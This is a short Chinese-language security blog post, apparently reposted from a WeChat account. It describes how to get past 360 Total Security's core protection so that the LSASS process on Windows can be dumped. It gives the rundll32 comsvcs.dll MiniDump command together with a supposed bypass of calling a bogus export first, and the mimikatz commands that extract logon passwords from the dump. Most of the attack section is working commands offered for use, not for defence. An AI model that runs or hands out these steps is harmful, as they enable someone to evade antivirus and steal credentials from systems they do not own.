零基础绕过360核晶dump lsass,变向抓密码

admin 2024年2月18日16:10:12评论29 views字数 703阅读2分20秒阅读模式
在远古时代,杀软没那么成熟的时候,抓密码可以直接使用以下命令,抓到之后会在指定的保存路径下生成一个二进制文件,将该生成的文件拿到本地再利用mimikatz离线处理
rundll32.exe C:windowsSystem32comsvcs.dll,MiniDump <进程ID> <保存路径> full

现在想直接利用这个命令dump lsass比较困难。应该大部分师傅现在已经放弃了这条命令了。因为可以替代的确实屈指可数。

零基础绕过360核晶dump lsass,变向抓密码

MiniDump介绍

Windows操作系统提供的一种API,用于生成程序的崩溃转储文件。当程序发生崩溃时,MiniDump API可以用于创建一个包含程序内存、寄存器状态、堆栈跟踪等信息的转储文件。这个转储文件可以帮助开发人员分析程序崩溃的原因,以便进行故障排除和修复。

通过了解MiniDump这个Api,可以发现mimikatz的工作原理其实也是围绕MiniDump进行展开的!!!

绕过方式

先执行:

rundll32.exe C:windowsSystem32comsvcs.dll,Fuck_Hacker

零基础绕过360核晶dump lsass,变向抓密码

后执行:

rundll32.exe C:windowsSystem32comsvcs.dll,MiniDump <进程ID> <保存路径> full

零基础绕过360核晶dump lsass,变向抓密码

把dump文件拿到本地之后,使用mimikatz离线处理
mimikatz.exe "log" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

零基础绕过360核晶dump lsass,变向抓密码

因为我自己的虚拟机没有设置密码,所以......

原文始发于微信公众号(零攻防):零基础绕过360核晶dump lsass,变向抓密码

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月18日16:10:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   零基础绕过360核晶dump lsass,变向抓密码https://cn-sec.com/archives/2500332.html

发表评论

匿名网友 填写信息